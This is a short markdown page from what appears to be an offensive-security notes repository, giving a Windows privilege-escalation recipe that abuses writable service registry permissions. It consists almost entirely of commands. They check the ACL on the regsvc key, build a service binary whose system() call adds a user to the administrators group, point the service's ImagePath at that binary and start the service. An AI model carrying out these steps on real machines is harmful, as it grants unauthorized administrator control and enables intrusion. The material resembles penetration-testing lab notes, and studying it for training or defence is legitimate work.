whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Windows/Service Escalation.md

518 B
Raw Blame History

Service Escalation

  • Check service control permission
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
  • Add command to system() function inside service.c, e.g. add user to administrators group
cmd.exe /k net localgroup administrators user /add
  • Compile via
x86_64-w64-mingw32-gcc service.c service.exe
  • Upload to target and
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
sc start regsvc